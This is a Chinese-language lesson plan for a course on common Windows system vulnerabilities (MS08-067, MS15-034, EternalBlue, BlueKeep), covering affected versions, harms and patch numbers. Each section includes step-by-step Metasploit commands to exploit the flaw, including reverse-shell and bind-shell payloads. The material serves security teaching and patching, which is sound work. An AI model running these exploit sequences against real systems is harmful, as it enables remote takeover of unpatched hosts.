




版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領
文檔簡介
常見的系統漏洞教學設計題目常見的系統漏洞授課專業學情分析了解學生的基礎理論知識、技能水平以及他們對系統漏洞的認識程度。確定教學的具體目標,例如,學生應該掌握哪些類型的系統漏洞,如何發現和防御這些漏洞,以及如何通過實驗來加深理解。教學目標通過學習,學生能夠識別和描述常見的系統漏洞類型,掌握使用各種安全工具和技術來發現、分析和利用系統漏洞的能力。過程與方法在教學過程中,應該注重理論與實踐相結合。通過課堂講解、案例分析和實驗操作等方式,讓學生在實踐中學習和體驗網絡安全的重要性。情感態度與價值觀使學生認識到系統漏洞對個人、組織和社會經濟的影響,培養起高度的安全意識和終身學習的習慣。教學重點了解并掌握各種系統漏洞影響的系統及版本、造成的危害和補救措施教學難點如何對系統漏洞進行補救教學方法采用多樣化的教學方法,如講授、討論、合作學習、案例分析等,以適應不同學生的學習需求和偏好。同時,利用現代教育技術手段,如多媒體教學、網絡模擬等,提高教學效果。持續更新學生了解如何獲取最新的安全動態和技術更新,以保持自己的知識和技能與時俱進。教學過程教學內容課堂組織一、案例引入列舉身邊的例子,是學生認識到系統漏洞的危害二、新課講解1.MS08_067漏洞(1)概述MS08-067漏洞的全稱是“WindowsServer服務RPC請求緩沖區溢出漏洞”,是在MSRPCoverSMB通道調用Server服務程序中的NetPathCanonicalize函數時觸發的。在遠程訪問其他主機時,會調用NetpwPathCanonicalize函數,對遠程訪問的路徑進行規范化,如果在NetpwPathCanonicalize函數中發生了棧緩沖區內存錯誤,就可能被利用實施遠程代碼執行。(2)影響的系統及版本(1)MicrosoftWindows2000ServicePack4(2)WindowsXPServicePack2(3)WindowsXPServicePack3(4)WindowsXPProfessionalx64Edition(5)WindowsXPProfessionalx64EditionServicePack2(6)WindowsServer2003ServicePack1(7)WindowsServer2003ServicePack2(8)WindowsServer2003x64Edition(9)WindowsServer2003x64EditionServicePack2(10)WindowsServer2003SP1(11)WindowsServer2003SP2(12)WindowsVista和WindowsVistaServicePack1(13)WindowsVistax64Edition和WindowsVistax64EditionServicePack1(14)WindowsServer2008(用于32位系統)(15)WindowsServer2008(用于基于x64的系統)(16)WindowsServer2008(用于基于Itanium的系統)(17)Windows7Beta(用于32位系統)(18)Windows7Betax64Edition(19)Windows7Beta(用于基于Itanium的系統)(3)漏洞復現①在Metasploit工具終端使用msfconsole打開控制臺后依次輸入以下命令。使用該漏洞的利用模塊:useexploit/windows/smb/ms08_067_netapi使用攻擊載荷:setpayloadgeneric/shell_bind_tcp設置攻擊機器監聽端口:setlport4444設置攻擊目標的IP地址:setrhosts執行攻擊:exploit②執行“cd..”命令2次返回到根目錄,執行“typetest.txt”命令查看被攻擊計算機上C盤目錄下的test.txt文件的內容。(4)漏洞造成的危害攻擊者可以利用MS08_067漏洞獲取目標主機的最高系統權限。(5)修補措施①升級到最新的Windows操作系統。②安裝KB958644補丁。2.MS15_034漏洞(1)概述HTTP協議堆棧(HTTP.sys)中存在一個遠程代碼執行漏洞,當HTTP.sys錯誤地解析特制HTTP請求時,會觸發該漏洞。成功利用此漏洞的攻擊者可以在系統賬戶的上下文中執行任意代碼。(2)影響的系統及版本(1)WindowsServer2003。(2)WindowsVista。(3)WindowsServer2008。(4)Windows7。(5)WindowsServer2008R2。(6)Windows8和Windows8.1。(7)WindowsServer2012和WindowsServer2012R2。(8)WindowsRT和WindowsRT8.1。(3)漏洞復現(1)在Metasploit工具終端使用msfconsole打開控制臺后依次輸入以下命令。使用該漏洞的利用模塊:useauxiliary/scanner/http/ms15_034_http_sys_memory_dump設置攻擊目標的IP地址:setrhosts執行攻擊:run(2)利用MS15_034漏洞。(3)查看目標計算機。(4)造成溢出,觸發漏洞造成藍屏(4)造成的危害①遠程讀取IIS服務器的數據。②造成服務器系統藍屏崩潰。(5)修補措施對于MS15_034漏洞,微軟給的建議是安裝補丁KB3042553。如果操作系統長時間未進行升級會顯示“此更新不適用于您的計算機”,此時需要安裝前置補丁KB3021910、KB2919355、KB3042553。其中,KB2919355是一組補丁。安裝補丁后,使用Range驗證,響應為“BadRequest”,說明此攻擊無效,已經修復漏洞。3.MS17_010漏洞(1)概述MS17-010(永恒之藍漏洞)的爆發源于WannaCry勒索病毒的誕生,該病毒是不法分子利用美國國家安全局泄露的漏洞“EternalBlue”(永恒之藍)改造而成的。MS17-010漏洞通過TCP的445和139端口,利用SMBv1和NBT中的遠程代碼執行漏洞,通過惡意代碼掃描并攻擊開放445文件共享端口的Windows主機。(2)影響的系統及版本(1)WindowsNT。(2)Windows2000。(3)WindowsXP。(4)Windows2003。(5)WindowsVista。(6)Windows7。(7)Windows8。(8)Windows2008。(9)Windows2008R2。(10)WindowsServer2012SP0。(3)漏洞復現①在Metasploit工具終端使用msfconsole打開控制臺后依次輸入以下命令。使用該漏洞的利用模塊:useexploit/windows/smb/ms17_010_eternalblue設置攻擊目標的IP地址:setrhosts設置攻擊載荷:setpayloadwindows/x64/meterpreter/reverse_tcp設置本機的IP地址:setlhosts設置本機的監聽端口:setlport4444執行攻擊:exploit②成功獲取目標主機權限。(4)造成的危害①攻擊者可以獲取目標主機的最高權限。②容易感染WannaCry勒索病毒。(5)修補措施不同版本的操作系統對應的MS17-010補丁編號如下。(1)WindowsXP特別補丁KB4012598(2)Windows2003特別補丁KB4012598(3)Windows2008R2補丁KB4012212、KB4012215(4)Windows7補丁KB4012212、KB4012215(5)Windows732位補丁KB4012212、KB4012215(6)Windows764位補丁KB4012212、KB4012215(7)Windows101607補丁KB4013429(8)Windows10160732位補丁KB4013429(9)Windows10160764位補丁KB4013429(10)Windows2012R2補丁KB4012213、KB4012216(11)Windows2016補丁KB40134294.CVE-2019-0708漏洞(1)概述在2019年5月的補丁周期中,微軟在其遠程桌面服務(RDS)中發布了一個遠程代碼執行錯誤補丁。遠程未經身份驗證的攻擊者可以通過將精心設計的RDP消息發送到目標服務器來利用此漏洞。攻擊者成功利用此漏洞可以執行任意代碼。(2)影響的系統及版本(1)WindowsXP(2)Windows7(3)WindowsServer2003(4)WindowsServer2008(5)WindowsServer2008R2(3)漏洞復現①在Metasploit工具終端使用msfconsole打開控制臺后依次輸入以下命令。使用該漏洞的利用模塊:useexploit/windows/rdp/cve_2019_0708_bluekeep_rce設置攻擊目標的IP地址:setrhosts68設置攻擊載荷:setpayloadwindows/x64/meterpreter/reverse_tcp設置本機的IP地址:setlhosts20設置本機的監聽端口:setlport4444執行攻擊:exploit②成功獲取到目標主機權限。(4)造成的危害①攻擊者可以獲取目標主機的最高權限。②可能造成目標主機藍屏。(5)修補措施(1)微軟已發布官方補丁程序修復該漏洞,騰訊安全專家建議用戶使用WindowsUpdate或騰訊電腦管家、騰訊御點終端安全管理系統的漏洞修復功能安裝補丁程序。(2)用戶也可以參考微軟官方網站的安全更新指南下載、安裝補丁。(3)如果用戶仍在使用已不被微軟支持的操作系統,包括Windows2003和WindowsXP,則解決此漏洞的最佳方法是將操作系統升級為最新版本的Windows操作系統。(4)使用Windows8和Windows10操作系統的用戶不受此漏洞的影響,無須擔心這個問題。(5)安裝補丁有困難或不使用遠程桌面服務的用戶,可采取其他緩解措施。三、思政課堂教育學生認識到系統漏洞的嚴重性,培養他們的安全意識和責任感,使他們能夠在未來的工
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經權益所有人同意不得將文件中的內容挪作商業或盈利用途。
- 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
- 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 2025荷蘭語等級考試B2級模擬試題集
- 2025年聚苯乙烯(PS)項目規劃申請報告
- 一堂難忘的課課堂學習體驗作文(14篇)
- 2025年衣架衣夾項目提案報告
- 小花仙成長故事童話作文(8篇)
- 2025年脫硫除塵設備項目提案報告
- 2025年理財規劃師(二級)考試試卷:金融衍生品市場分析
- 2025年工具油項目立項申請報告模板
- 2025年密閉式雞舍光周期自動控制設備項目規劃申請報告模范
- 金融行業從業資格及表現證明(7篇)
- 小學語文擴句、縮句專題
- 美軍標電子裝備環境試驗-mil-std-810g
- 農村公路安全生命防護工程施工方案
- (部編版)統編版小學語文教材目錄(一至六年級上冊下冊齊全)
- 抗滑樁專項的施工組織方案[專家評審]
- 常用彈簧鋼號對照表
- 應用回歸分析(第三版)何曉群_劉文卿_課后習題答案_完整版
- 小學二年級下冊勞動教案
- 食品安全及衛生保證措施
- 60m3臥式液化石油氣儲罐設計
- 上期開特下期出特公式
評論
0/150
提交評論